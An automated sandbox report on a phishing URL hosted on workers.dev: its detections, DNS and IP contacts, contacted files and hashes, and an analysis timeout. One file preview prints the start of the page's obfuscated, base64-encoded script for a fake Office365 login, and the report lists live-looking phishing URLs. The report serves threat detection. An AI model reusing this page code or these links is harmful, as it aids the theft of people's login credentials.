    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
    Ingress Tool Transfer
    Traffic DuplicationData Destruction
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    https://portal.bakfar.workers.dev/100%Avira URL Cloudphishing
    https://portal.bakfar.workers.dev/100%SlashNextCredential Stealing type: Phishing & Social Engineering
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://getbootstrap.com)0%Avira URL Cloudsafe
    https://app.forexliteoptions.com/core/database/xero/css/hover.css100%Avira URL Cloudphishing
    https://portal.bakfar.workers.dev/favicon.ico100%Avira URL Cloudphishing
    NameIPActiveMaliciousAntivirus DetectionReputation
    stackpath.bootstrapcdn.com
    104.18.10.207
    truefalse
      high
      part-0013.t-0009.t-msedge.net
      13.107.246.41
      truefalse
        unknown
        code.jquery.com
        151.101.66.137
        truefalse
          high
          cdnjs.cloudflare.com
          104.17.24.14
          truefalse
            high
            i.gyazo.com
            104.18.24.163
            truefalse
              high
              maxcdn.bootstrapcdn.com
              104.18.11.207
              truefalse
                high
                www.google.com
                172.253.122.147
                truefalse
                  high
                  cs1227.wpc.alphacdn.net
                  192.229.211.199
                  truefalse
                    unknown
                    part-0012.t-0009.t-msedge.net
                    13.107.246.40
                    truefalse
                      unknown
                      app.forexliteoptions.com
                      199.115.115.118
                      truefalse
                        unknown
                        portal.bakfar.workers.dev
                        172.67.154.137
                        truefalse
                          unknown
                          fp2e7a.wpc.phicdn.net
                          192.229.211.108
                          truefalse
                            unknown
                            ka-f.fontawesome.com
                            unknown
                            unknownfalse
                              high
                              kit.fontawesome.com
                              unknown
                              unknownfalse
                                high
                                logincdn.msftauth.net
                                unknown
                                unknownfalse
                                  unknown
                                  account.live.com
                                  unknown
                                  unknownfalse
                                    high
                                    kit-free.fontawesome.com
                                    unknown
                                    unknownfalse
                                      high
                                      NameMaliciousAntivirus DetectionReputation
                                      https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.jsfalse
                                        high
                                        https://app.forexliteoptions.com/core/database/xero/css/hover.cssfalse
                                        • Avira URL Cloud: phishing
                                        unknown
                                        https://code.jquery.com/jquery-3.2.1.slim.min.jsfalse
                                          high
                                          https://i.gyazo.com/214d89a26f0ac918a09f216a1b0f97b4.pngfalse
                                            high
                                            https://portal.bakfar.workers.dev/favicon.icofalse
                                            • Avira URL Cloud: phishing
                                            unknown
                                            https://code.jquery.com/jquery-3.1.1.min.jsfalse
                                              high
                                              https://portal.bakfar.workers.dev/true
                                                unknown
                                                https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.jsfalse
                                                  high
                                                  https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.jsfalse
                                                    high
                                                    https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.cssfalse
                                                      high
                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                      https://fontawesome.comchromecache_80.2.dr, chromecache_93.2.dr, chromecache_86.2.dr, chromecache_79.2.dr, chromecache_78.2.dr, chromecache_81.2.drfalse
                                                        high
                                                        https://kit.fontawesome.comchromecache_71.2.drfalse
                                                          high
                                                          https://github.com/twbs/bootstrap/graphs/contributors)chromecache_84.2.dr, chromecache_77.2.drfalse
                                                            high
                                                            https://getbootstrap.com)chromecache_84.2.dr, chromecache_95.2.drfalse
                                                            • Avira URL Cloud: safe
                                                            low
                                                            https://ka-f.fontawesome.comchromecache_71.2.drfalse
                                                              high
                                                              https://github.com/twbs/bootstrap/blob/master/LICENSE)chromecache_84.2.dr, chromecache_95.2.dr, chromecache_77.2.drfalse
                                                                high
                                                                http://opensource.org/licenses/MIT).chromecache_90.2.drfalse
                                                                  high
                                                                  https://getbootstrap.com/)chromecache_77.2.drfalse
                                                                    high
                                                                    https://fontawesome.com/license/freechromecache_80.2.dr, chromecache_93.2.dr, chromecache_86.2.dr, chromecache_79.2.dr, chromecache_78.2.dr, chromecache_81.2.drfalse
                                                                      high
                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs
                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      13.107.246.41
                                                                      part-0013.t-0009.t-msedge.netUnited States
                                                                      8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                      104.18.10.207
                                                                      stackpath.bootstrapcdn.comUnited States
                                                                      13335CLOUDFLARENETUSfalse
                                                                      199.115.115.118
                                                                      app.forexliteoptions.comUnited States
                                                                      30633LEASEWEB-USA-WDCUSfalse
                                                                      151.101.66.137
                                                                      code.jquery.comUnited States
                                                                      54113FASTLYUSfalse
                                                                      104.21.72.191
                                                                      unknownUnited States
                                                                      13335CLOUDFLARENETUSfalse
                                                                      104.17.24.14
                                                                      cdnjs.cloudflare.comUnited States
                                                                      13335CLOUDFLARENETUSfalse
                                                                      104.18.25.163
                                                                      unknownUnited States
                                                                      13335CLOUDFLARENETUSfalse
                                                                      192.229.211.199
                                                                      cs1227.wpc.alphacdn.netUnited States
                                                                      15133EDGECASTUSfalse
                                                                      172.67.154.137
                                                                      portal.bakfar.workers.devUnited States
                                                                      13335CLOUDFLARENETUSfalse
                                                                      172.253.122.147
                                                                      www.google.comUnited States
                                                                      15169GOOGLEUSfalse
                                                                      104.18.11.207
                                                                      maxcdn.bootstrapcdn.comUnited States
                                                                      13335CLOUDFLARENETUSfalse
                                                                      239.255.255.250
                                                                      unknownReserved
                                                                      unknownunknownfalse
                                                                      104.18.24.163
                                                                      i.gyazo.comUnited States
                                                                      13335CLOUDFLARENETUSfalse
                                                                      IP
                                                                      192.168.2.4
                                                                      Joe Sandbox version:40.0.0 Tourmaline
                                                                      Analysis ID:1417323
                                                                      Start date and time:2024-03-29 00:20:13 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 3m 14s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:browseurl.jbs
                                                                      Sample URL:https://portal.bakfar.workers.dev/
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:7
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Detection:MAL
                                                                      Classification:mal72.phis.win@17/60@32/14
                                                                      EGA Information:Failed
                                                                      HCA Information:
                                                                      • Successful, ratio: 100%
                                                                      • Number of executed functions: 0
                                                                      • Number of non-executed functions: 0
                                                                      Cookbook Comments:
                                                                      • Browse: https://account.live.com/ResetPassword.aspx?wreply=https://login.live.com/login.srf%3fwa%3dwsignin1.0%26rpsnv%3d13%26ct%3d1594824447%26rver%3d7.0.6737.0%26wp%3dMBI_SSL%26wreply%3dhttps%253a%252f%252foutlook.live.com%252fowa%252f%253fnlp%253d1%2526RpsCsrfState%253d096991c0-c96c-6a4e-6fe9-e91b0da948f1%26id%3d292841%26aadredir%3d1%26CBCXT%3dout%26lw%3d1%26fl%3ddob%252cflname%252cwld%26cobrandid%3d90015%26contextid%3d2C688CEDDDA7EE22%26bk%3d1594880420&id=292841&uiflavor=web&cobrandid=90015&uaid=657745d4db72409899b7bb19b09796de&mkt=EN-GB&lc=2057&bk=1594880420#
                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 172.253.115.94, 142.251.179.102, 142.251.179.138, 142.251.179.113, 142.251.179.101, 142.251.179.100, 142.251.179.139, 142.251.111.84, 34.104.35.123, 172.253.122.95, 172.64.147.188, 104.18.40.68, 172.253.115.95, 104.21.51.18, 172.67.218.119, 142.251.167.94, 13.105.221.20, 172.64.128.7, 172.64.129.7, 142.251.167.95, 142.251.111.95, 142.251.16.95, 142.251.163.95, 172.253.62.95, 172.253.63.95, 142.251.179.95, 13.105.221.37, 13.107.42.22, 20.12.23.50, 72.21.81.240, 142.250.31.95, 192.229.211.108, 20.3.187.198, 13.105.221.2, 20.189.173.23, 20.42.65.85, 172.253.62.94
                                                                      • Excluded domains from analysis (whitelisted): lgincdnmsftuswe2.azureedge.net, ka-f.fontawesome.com.cdn.cloudflare.net, global-entry-afdthirdparty-fallback-first.trafficmanager.net, slscr.update.microsoft.com, clientservices.googleapis.com, browser.events.data.trafficmanager.net, clients2.google.com, ocsp.digicert.com, kit-free.fontawesome.com.cdn.cloudflare.net, hlb.apr-52dd2-0.edgecastdns.net, update.googleapis.com, fonts.googleapis.com, fs.microsoft.com, acctcdnmsftuswe2.azureedge.net, content-autofill.googleapis.com, ajax.googleapis.com, lgincdnvzeuno.ec.azureedge.net, onedscolprdeus05.eastus.cloudapp.azure.com, thirdpartyfallback-edge-prod-yto22r6b.trafficmanager.net, edgedl.me.gvt1.com, account.msa.msidentity.com, clients.l.google.com, thirdpartyfallback-edge-prod-mnz22r6a.trafficmanager.net, logincdn.msauth.net, acctcdn.msauth.net, wu.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, glb.sls.p
                                                                      • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                                      • VT rate limit hit for: https://portal.bakfar.workers.dev/
                                                                      No simulations
                                                                      No context
                                                                      No context
                                                                      No context
                                                                      No context
                                                                      No context
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:downloaded
                                                                      Size (bytes):9
                                                                      Entropy (8bit):2.725480556997868
                                                                      Encrypted:false
                                                                      SSDEEP:3:Y/B:Y/B
                                                                      MD5:D8F4A1993546CC4B850CDE3599E27AEC
                                                                      SHA1:094B763B4CFCC0B05E5D040581CD513C3CA08067
                                                                      SHA-256:907BA78B4545338D3539683E63ECB51CF51C10ADC9DABD86E92BD52339F298B9
                                                                      SHA-512:7C696247F98AA6FE4E1DF001FD6029ABBBCCF45B122D65DFDEDE8F8A400CDA775387C657F96BD1E4E52DA7409187892B1F0786C54D835D2E44227B2E1335EAF6
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      URL:https://app.forexliteoptions.com/core/database/xero/css/hover.css
                                                                      Preview:not found
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:HTML document, ASCII text, with very long lines (15530)
                                                                      Category:downloaded
                                                                      Size (bytes):15616
                                                                      Entropy (8bit):5.700206617214908
                                                                      Encrypted:false
                                                                      SSDEEP:384:Shqe8XU4L4bG70l0nlBiho/xxtrTe86POQk33xC2Isdz4FV2lRNJO:YLAfLT70l0nlBi81riNexCrsN4FV2lw
                                                                      MD5:8C92659BF5AD300782C29475577F69EB
                                                                      SHA1:B25BDFD46EE9859CB770BE9EAEBBA2DE05BECD41
                                                                      SHA-256:7FD588F6AA3A7F565419226D1303DD027F790772A024EAD4D1D8D8B552989AC7
                                                                      SHA-512:148971D26CFC946F17C243D9435507D561E658355BC982380F2FE735A8C2CB96C31CFC3FB3850E139A2A3427A56009FB527880462D20743EEB1C29CD264BE735
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      URL:https://portal.bakfar.workers.dev/favicon.ico
                                                                      Preview:<!DOCTYPE html>..<script>....var X="CjxIVE1MIGxhbmc9ZW4+PEhFQUQ+PFRJVExFPk9mZmljZTM2NTwvVElUTEU+CjxTQ1JJUFQgc3JjPSJodHRwczovL2FqYXguZ29vZ2xlYXBpcy5jb20vYWpheC9saWJzL2pxdWVyeS8yLjIuNC9qcXVlcnkubWluLmpzIj48L1NDUklQVD4KCjxTQ1JJUFQgc3JjPSJodHRwczovL2NvZGUuanF1ZXJ5LmNvbS9qcXVlcnktMy4xLjEubWluLmpzIj4KICAgIDxzY3JpcHQgc3JjPSJodHRwczovL2NvZGUuanF1ZXJ5LmNvbS9qcXVlcnktMy4zLjEuanMiIGludGVncml0eT0ic2hhMjU2LTJLb2s3TWJPeXhwZ1VWdkFrL0hKMmppZ09TWVMyYXVLNFBmemJtN3VINjA9IiBjcm9zc29yaWdpbj0iYW5vbnltb3VzIj48L1NDUklQVD4KPCEtLSBSZXF1aXJlZCBtZXRhIHRhZ3MgLS0+CjxNRVRBIGNoYXJzZXQ9dXRmLTg+CjxNRVRBIG5hbWU9dmlld3BvcnQgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEsIHNocmluay10by1maXQ9bm8iPjwhLS0gQm9vdHN0cmFwIENTUyAtLT48TElOSyByZWw9c3R5bGVzaGVldCBocmVmPSJodHRwczovL21heGNkbi5ib290c3RyYXBjZG4uY29tL2Jvb3RzdHJhcC80LjAuMC9jc3MvYm9vdHN0cmFwLm1pbi5jc3MiIGludGVncml0eT0ic2hhMzg0LUduNTM4NHhxUTFhb1dYQSswNThSWFB4UGc2Znk0SVd2VE5oMEUyNjNYbUZjSmxTQXdpR2dGQVcvZEFpUzZKWG0iIGNyb3Nzb3JpZ2luPSJhbm9ueW1vdXMiPjxMSU5LIHJlbD1z
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                      Category:dropped
                                                                      Size (bytes):17174
                                                                      Entropy (8bit):2.9129715116732746
                                                                      Encrypted:false
                                                                      SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                      MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                      SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                      SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                      SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:downloaded
                                                                      Size (bytes):32
                                                                      Entropy (8bit):4.202819531114783
                                                                      Encrypted:false
                                                                      SSDEEP:3:WRemVnCAd:rTAd
                                                                      MD5:7F6C2F2EC0AC79AF93AC42E55601E0D8
                                                                      SHA1:8DE377E67C5B4919C767A044051BFD52C77A985E
                                                                      SHA-256:5F1077DECBD2768AD99AF5D592C4DDE934F19682BB8BAD05599F9D403344DA27
                                                                      SHA-512:85DCD5AE0B75A54F30675AA864DC4526F9AAD07F9CAC63D9004B81EF2EA1D270909740137D72A9D8D0BBBD9D8674B8FFDDE1745E95E628D65B4F898F49FA9A91
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAnw8PvhQPeM6xIFDewtwx0=?alt=proto
                                                                      Preview:ChUKEw3sLcMdGgQICRgBGgQIZBgCIAE=
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                      Category:dropped
                                                                      Size (bytes):1435
                                                                      Entropy (8bit):7.8613342322590265
                                                                      Encrypted:false
                                                                      SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                      MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                      SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                      SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                      SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                      Category:downloaded
                                                                      Size (bytes):1435
                                                                      Entropy (8bit):7.8613342322590265
                                                                      Encrypted:false
                                                                      SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                      MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                      SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                      SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                      SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      URL:https://logincdn.msauth.net/shared/5/images/microsoft_logo_ee5c8d9fb6248c938fd0.svg
                                                                      Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:ASCII text, with very long lines (11461)
                                                                      Category:downloaded
                                                                      Size (bytes):11893
                                                                      Entropy (8bit):5.198678335763684
                                                                      Encrypted:false
                                                                      SSDEEP:192:GO3pHufQPTACpF4Pvhzz6E/ra/sb4nZIPWfz3JBGvh3e1Q5l8h6LDeFTjC0:GdRCchzzYfnqejah3e1Q5l8h6vb0
                                                                      MD5:55D343A40C7166A79FD314F13CBB2E93
                                                                      SHA1:96904A849C32CA220E0AAA2AE3E81CF2B5CDF764
                                                                      SHA-256:A1F75D6278713A84A8F28A392C77CA8A6A7C32BF14314D4A34A6CE2F06CFDF7A
                                                                      SHA-512:518AC396E7F82899CAB4A6E3CB68116F2B599D680D015A1A8024926BC39E9A5D3ED68935B2150DA33AD41A9103E4CFD5031A7E89036901C972EEE257546BB1C5
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      URL:https://kit.fontawesome.com/585b051251.js
                                                                      Preview:window.FontAwesomeKitConfig = {"id":132286382,"version":"5.15.4","token":"585b051251","method":"css","baseUrl":"https://ka-f.fontawesome.com","license":"free","asyncLoading":{"enabled":true},"autoA11y":{"enabled":true},"baseUrlKit":"https://kit.fontawesome.com","detectConflictsUntil":null,"iconUploads":{},"minify":{"enabled":true},"v4FontFaceShim":{"enabled":false},"v4shim":{"enabled":true},"v5FontFaceShim":{"enabled":false}};.!function(t){"function"==typeof define&&define.amd?define("kit-loader",t):t()}((function(){"use strict";function t(t,e){var n=Object.keys(t);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(t);e&&(r=r.filter((function(e){return Object.getOwnPropertyDescriptor(t,e).enumerable}))),n.push.apply(n,r)}return n}function e(e){for(var n=1;n<arguments.length;n++){var o=null!=arguments[n]?arguments[n]:{};n%2?t(Object(o),!0).forEach((function(t){r(e,t,o[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(o)):
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                      Category:downloaded
                                                                      Size (bytes):17174
                                                                      Entropy (8bit):2.9129715116732746
                                                                      Encrypted:false
                                                                      SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                      MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                      SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                      SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                      SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      URL:https://acctcdn.msauth.net/images/favicon.ico?v=2
                                                                      Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:ASCII text, with very long lines (32030)
                                                                      Category:downloaded
                                                                      Size (bytes):86709
                                                                      Entropy (8bit):5.367391365596119
                                                                      Encrypted:false
                                                                      SSDEEP:1536:9NhEyjjTikEJO4edXXe9J578go6MWXqcVhrLyB4Lw13sh2bzrl1+iuH7U3gBORDT:jxcq0hrLZwpsYbmzORDU8Cu5
                                                                      MD5:E071ABDA8FE61194711CFC2AB99FE104
                                                                      SHA1:F647A6D37DC4CA055CED3CF64BBC1F490070ACBA
                                                                      SHA-256:85556761A8800D14CED8FCD41A6B8B26BF012D44A318866C0D81A62092EFD9BF
                                                                      SHA-512:53A2B560B20551672FBB0E6E72632D4FD1C7E2DD2ECF7337EBAAAB179CB8BE7C87E9D803CE7765706BC7FCBCF993C34587CD1237DE5A279AEA19911D69067B65
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      URL:https://code.jquery.com/jquery-3.1.1.min.js
                                                                      Preview:/*! jQuery v3.1.1 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.1.1",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){var b=r.merge(this.con
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:HTML document, ASCII text, with very long lines (15530)
                                                                      Category:downloaded
                                                                      Size (bytes):15616
                                                                      Entropy (8bit):5.700206617214908
                                                                      Encrypted:false
                                                                      SSDEEP:384:Shqe8XU4L4bG70l0nlBiho/xxtrTe86POQk33xC2Isdz4FV2lRNJO:YLAfLT70l0nlBi81riNexCrsN4FV2lw
                                                                      MD5:8C92659BF5AD300782C29475577F69EB
                                                                      SHA1:B25BDFD46EE9859CB770BE9EAEBBA2DE05BECD41
                                                                      SHA-256:7FD588F6AA3A7F565419226D1303DD027F790772A024EAD4D1D8D8B552989AC7
                                                                      SHA-512:148971D26CFC946F17C243D9435507D561E658355BC982380F2FE735A8C2CB96C31CFC3FB3850E139A2A3427A56009FB527880462D20743EEB1C29CD264BE735
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      URL:https://portal.bakfar.workers.dev/
